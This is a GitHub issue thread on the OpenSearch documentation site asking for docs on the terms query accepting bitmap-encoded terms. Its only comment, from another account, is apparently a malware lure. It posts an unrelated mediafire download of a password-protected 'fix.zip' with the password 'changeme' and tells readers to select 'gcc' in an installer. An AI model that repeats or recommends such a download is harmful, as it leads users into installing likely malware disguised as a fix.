### ISSUE TITLE
[DOC] Terms query can accept encoded terms input as bitmap

### ISSUE THREAD

**Issue by bowenlan-amzn** [opensearch-project/documentation-website#8121]
**What do you want to do?**
 
- [x] Request a change to existing documentation
- [ ] Add new documentation
- [ ] Report a technical problem with the documentation
- [ ] Other 

**Tell us about your request.** Provide a summary of the request.

https://github.com/opensearch-project/OpenSearch/pull/14774/

I will raise a PR shortly to add documentation in terms query page about its new ability to accept a bitmap value which is a encoded terms list.

***Version:** List the OpenSearch version to which this issue applies, e.g. 2.14, 2.12--2.14, or all.

2.17
 
**What other resources are available?** Provide links to related issues, POCs, steps for testing, etc.

**Comment by jungminjun824** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
